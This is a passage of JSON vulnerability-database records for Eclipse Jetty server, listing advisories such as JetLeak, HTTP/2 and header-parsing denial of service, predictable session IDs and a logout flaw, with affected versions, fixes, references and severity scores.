"8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", "9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.2.v20140723", "9.2.3.v20140905", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.2.8.v20150217", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/11/GHSA-ghgj-3xqr-6jfm/GHSA-ghgj-3xqr-6jfm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-2080" }, { "type": "WEB", "url": "https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-ghgj-3xqr-6jfm" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190307-0005" }, { "type": "WEB", "url": "http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html" }, { "type": "WEB", "url": "http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00075.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-March/151804.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2015/Mar/12" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/534755/100/1600/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/72768" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1031800" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:37:23Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h2f4-v4c4-6wx4", "published": "2019-03-28T18:33:38Z", "modified": "2024-02-19T05:52:03.950097Z", "aliases": [ "CVE-2018-12545" ], "summary": "Uncontrolled Resource Consumption in org.eclipse.jetty:jetty-server", "details": "In Eclipse Jetty version 9.3.x and 9.4.x, the server is vulnerable to Denial of Service conditions if a remote client sends either large SETTINGs frames container containing many settings, or many small SETTINGs frames. The vulnerability is due to the additional CPU and memory allocations required to handle changed settings.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.12.v20180830" } ] } ], "versions": [ "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.12.RC2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-h2f4-v4c4-6wx4/GHSA-h2f4-v4c4-6wx4.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.25.v20180904" } ] } ], "versions": [ "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.3.v20150827", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.3.24.v20180605", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-h2f4-v4c4-6wx4/GHSA-h2f4-v4c4-6wx4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12545" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=538096" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-h2f4-v4c4-6wx4" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/13f5241048ec0bf966a6ddd306feaf40de5b20e1f09096b9cddeddf2@%3Ccommits.accumulo.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/70744fe4faba8e2fa7e50a7fc794dd03cb28dad8b21e08ee59bb1606@%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/febc94ffec9275dcda64633e0276a1400cd318e571009e4cda9b7a79@%3Cnotifications.accumulo.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CIS4LALKZNLF5X5IGNGRSKERG7FY4QG6" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:38:26Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jg2x-r643-w2ch", "published": "2022-05-01T07:43:29Z", "modified": "2024-02-12T16:41:58.146447Z", "aliases": [ "CVE-2006-6969" ], "summary": "Jetty Uses Predictable Session Identifiers", "details": "Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.2.27" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-jg2x-r643-w2ch/GHSA-jg2x-r643-w2ch.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "5.1.0" }, { "fixed": "5.1.12" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-jg2x-r643-w2ch/GHSA-jg2x-r643-w2ch.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-jg2x-r643-w2ch/GHSA-jg2x-r643-w2ch.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.1.0pre1" }, { "fixed": "6.1.0pre3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-jg2x-r643-w2ch/GHSA-jg2x-r643-w2ch.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-6969" }, { "type": "WEB", "url": "https://github.com/jetty-project/codehaus-jetty6/commit/36f81d2e7058b012f6718bc2f1e2786694a8a4a1" }, { "type": "WEB", "url": "https://github.com/jetty-project/codehaus-jetty6/commit/b31f606bf8058a38ab6253aa8dc2dfe6a7f83c78" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/32240" }, { "type": "PACKAGE", "url": "https://github.com/jetty-project/codehaus-jetty6" }, { "type": "WEB", "url": "https://web.archive.org/web/20070208112816/http://fisheye.codehaus.org/changelog/jetty/?cs=1274" }, { "type": "WEB", "url": "https://web.archive.org/web/20070602184857/http://archives.neohapsis.com/archives/bugtraq/2007-02/0070.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20121019131825/http://www.securityfocus.com/archive/1/459164/100/0/threaded" }, { "type": "WEB", "url": "https://web.archive.org/web/20200228100052/http://www.securityfocus.com/bid/22405" } ], "database_specific": { "cwe_ids": [ "CWE-330" ], "github_reviewed": true, "github_reviewed_at": "2024-02-12T16:20:55Z", "nvd_published_at": "2007-02-07T11:28:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-m394-8rww-3jr7", "published": "2021-03-10T03:46:47Z", "modified": "2025-09-15T07:42:08.143128Z", "aliases": [ "BIT-nifi-2020-27223", "BIT-solr-2020-27223", "BIT-spark-2020-27223", "CVE-2020-27223" ], "related": [ "CVE-2020-27223" ], "summary": "DOS vulnerability for Quoted Quality CSV headers", "details": "### Impact\nWhen Jetty handles a request containing request headers with a large number of “quality” (i.e. q) parameters (such as what are seen on the `Accept`, `Accept-Encoding`, and `Accept-Language` request headers), the server may enter a denial of service (DoS) state due to high CPU usage while sorting the list of values based on their quality values. A single request can easily consume minutes of CPU time before it is even dispatched to the application.\n\nThe only features within Jetty that can trigger this behavior are:\n\n- Default Error Handling - the `Accept` request header with the `QuotedQualityCSV` is used to determine what kind of content to send back to the client (html, text, json, xml, etc)\n- `StatisticsServlet` - uses the `Accept` request header with the `QuotedQualityCSV` to determine what kind of content to send back to the client (xml, json, text, html, etc)\n- `HttpServletRequest.getLocale()` - uses the `Accept-Language` request header with the `QuotedQualityCSV` to determine which “preferred” language is returned on this call.\n- `HttpservletRequest.getLocales()` - is similar to the above, but returns an ordered list of locales based on the quality values on the `Accept-Language` request header.\n- `DefaultServlet` - uses the `Accept-Encoding` request header with the `QuotedQualityCSV` to determine which kind of pre-compressed content should be sent back for static content (content that is not matched against a url-pattern in your web app)\n\n### Versions\n`QuotedQualityCSV` was introduced to Jetty 9.3.9.v20160517 and the bug that introduced the vulnerability was in 9.4.6.v20170531. \n\nCurrently, known vulnerable versions include:\n\n- 9.4.6.v20170531 thru to 9.4.36.v20210114\n- 10.0.0\n- 11.0.0\n\n### Workarounds\n\nQuality ordered values are used infrequently by jetty so they can be avoided by:\n\n * Do not use the default error page/handler.\n * Do not deploy the `StatisticsServlet` exposed to the network\n * Do not call `getLocale` API\n * Do not enable precompressed static content in the `DefaultServlet` \n\n### Patches\n\nAll patches are available for download from the Eclipse Jetty website at [https://www.eclipse.org/jetty/download.php](https://www.eclipse.org/jetty/download.php)\n- 9.4.37.v20210219 and greater\n- 10.0.1 and greater \n- 11.0.1 and greater", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.6" }, { "fixed": "9.4.37" } ] } ], "versions": [ "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-m394-8rww-3jr7/GHSA-m394-8rww-3jr7.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0" }, { "fixed": "10.0.1" } ] } ], "versions": [ "10.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-m394-8rww-3jr7/GHSA-m394-8rww-3jr7.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0" }, { "fixed": "11.0.1" } ] } ], "versions": [ "11.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-m394-8rww-3jr7/GHSA-m394-8rww-3jr7.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-m394-8rww-3jr7" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27223" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd666e187ebea2fda8624683ab51e2a5ad2108f762d21bf1a383d7502@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc721fe2910533bffb6bd4d69ea8ff4f36066d260dbcd2d14e041614a@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc052fd4e9e9c01bead74c0b5680355ea5dc3b72d46f253cb65d03e43@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb79b62ac3085e05656e41865f5a7efcbdc7dcd7843abed9c5fe0fef8@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raa6d60b00b67c0550672b4f506f0df75b323dcd25cf574e91e2f2dff@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra47a26c008487b0a739a368c846e168de06c3cd118d31ecedafa679a@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra40a88a2301a3da86e25b501ff4bc88124f2b816c2917d5f3497f8f0@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra384892bab8c03a60613a6a9d5e9cae0a2b800fd882792a55520115e@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2f529da674f25a7351543544f7d621b5227c49a0745913b1194d11e@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8dc1b13b80d39fbf4a9d158850e15cd868f0460c2f364f13dca7050b@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8b1963f16d6cb1230ca7ee73b6ec4f5c48f344191dbb1caabd265ee4@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r897a6a14d03eab09e89b809d2a650f3765065201da5bc3db9a4dd6e8@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r857b31ad16c6e76002bc6cca73c83358ed2595477e288286ee82c48d@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r855b24a3bde3674256152edfc53fb8c9000f9b59db3fecbbde33b211@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7ffd050d3bd7c90d95f4933560b5f4f15971ab9a5f5322fdce116243@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7fbdb7880be1566f943d80fbbeefde2115c086eba1bef3115350a388@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8e24a3e482e5984bc8c5492dc790413e4fdc1234e3debb94515796b@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd6c47321db1bfe12c68a898765bf3b6f97e2afa6a501254ed4feaed@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re03a4dbc15df6f390a2f8c0a071c31c8324dbef007e59fdc2592091a@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0d38cc2b5da28f708fc89de49036f3ace052c47a1202f7d70291614@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re19fa47ec901cc3cf6d7784027198e8113f8bc2dbfd6c9d6d13f5447@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3bd4f831f9be49871cb6adb997289b5dbcd6fe4bc5cb08223254080@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re43768896273c0b5f1a03d7f0a9d370852074489d51825fdc0d77f0f@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re819198d4732804dc01fca8b5b144689a118ede49f6128968773595c@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reb3c6dc050c7ee18ea154cd94dba85d99aa6b02b84c4bb2138a4abf2@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reca91f217f9e1ce607ce6e19a1c0b3db82b5b1b58cf39a84d6434695@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf190d1d28e1367d1664ef6bc2f71227566d7b6b39209817a5364da1f@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf6c2efa3137bc8c22707e550a1f9b80f74bca62b9c8a6f768f2c6b86@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf77f4c4583669f1133d58cc4f1964367e253818ed8db986bb2732f7c@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff630ce92a4d1bb494fc1a3f9b57a3d60819b436505bcd8c6ccc713c@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210401-0005" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2c947376491a20d1cf143bf3c21ed74113e099d806cfe4c490a45ad8@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2c2c7b2971360fb946bbf062c58d7245927dd1ce9150fc9987f65409@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r27ad7843d060762cc942820566eeaa9639f75371afedf8124b943283@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r26d9196f4d2afb9bec2784bcb6fc183aca82e4119bf41bdc613eec01@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b803e6ebdac5f670708878fb1b27cd7a0ce9d774a60e797e58cee6f@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b7ed296a865e3f1337a96ee9cd51f6d154d881a30da36020ca72a4b@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1414ab2b3f4bb4c0e736caff6dc8d15f93f6264f0cca5c47710d7bb3@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r105f4e52feb051faeb9141ef78f909aaf5129d6ed1fc52e099c79463@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0e25cdf3722a24c53049d37396f0da8502cb4b7cdc481650dc601dbc@%3Cgitbox.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0cdab13815fc419805a332278c8d27e354e78560944fc36db0bdc760@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0c6eced465950743f3041b03767a32b2e98d19731bd72277fc7ea428@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0b639bd9bfaea265022125d18acd2fc6456044b76609ec74772c9567@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r07aedcb1ece62969c406cb84c8f0e22cec7e42cdc272f3176e473320@%3Cusers.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r068dfd35ce2193f6af28b74ff29ab148c2b2cacb235995576f5bea78@%3Cissues.solr.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=571128" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7f4ad5eec0bce2821c308bb23cac53df5c94eb84de1c58de9b95c176@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75ee2a529edb892ac59110cb3f6f91844a932c5034e16c8317f5668d@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r734f996149bb9b1796740385fcbdf3e093eb9aabedc0f20a48ea1d68@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r601f15f3de7ae3a7bbcd780c19155075c56443c2cdc1d193c03b4182@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b7cc6ac733e0b35816751cf45d152ae246a3f40e0b1e62b101c9522@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r562a0cbc5c8cac4d000a27b2854a8ab1b924aa9dd45f8ffbea98e5ad@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5612dc69e1f79c421faf9764ffbc92591e2a69ea417c04cba57f49ea@%3Cuser.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r521a077885ce79c44a799118c878589e81e525cab72d368e5cfb6f61@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r51f8975ef47c12a46fbfd7da9efea7f08e1d307fe1dc3042514659ae@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4c92ea39167c0f7b096ae8268db496b5451d69606f0304b7c8a994c7@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4a456d89a83752a012d88a60ff4b21def6c9f650b9e69ea9fa11c9f9@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r492cff8488a7f6eb96700afb5d137b719ddb80a833e77f971d2691c6@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r463b12b27264c5e1e3c48c8c2cc5d33813d2f0d981102548fb3102fb@%3Cissues.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r409ee2bae66bfff6aa89e6c74aff535e6248260d3afcb42bfb3b316b@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3ce0e31b25ad4ee8f7c42b62cfdc72d1b586f5d6accd23f5295b6dd1@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r35ab810c0f3016b3fd3a3fa9088a2d2781b354a810780ce74d022b6c@%3Cdev.kafka.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-03-10T03:46:22Z", "nvd_published_at": "2021-02-26T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-m6cp-vxjx-65j6", "published": "2021-06-23T20:23:04Z", "modified": "2024-02-17T05:34:59.415608Z", "aliases": [ "CVE-2021-34428" ], "related": [ "CVE-2021-34428" ], "summary": "SessionListener can prevent a session from being invalidated breaking logout", "details": "### Impact\nIf an exception is thrown from the `SessionListener#sessionDestroyed()` method, then the session ID is not invalidated in the session ID manager. On deployments with clustered sessions and multiple contexts this can result in a session not being invalidated. This can result in an application used on a shared computer being left logged in.\n\nThere is no known path for an attacker to induce such an exception to be thrown, thus they must rely on an application to throw such an exception. The OP has also identified that during the call to `sessionDestroyed`, the `getLastAccessedTime()` throws an `IllegalStateException`, which potentially contrary to the servlet spec, so applications calling this method may always throw and fail to log out. If such an application was only tested on a non clustered test environment, then it may be deployed on a clustered environment with multiple contexts and fail to log out.\n\n### Workarounds\nThe application should catch all Throwables within their `SessionListener#sessionDestroyed()` implementations.\n", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-server", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.4.41" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", 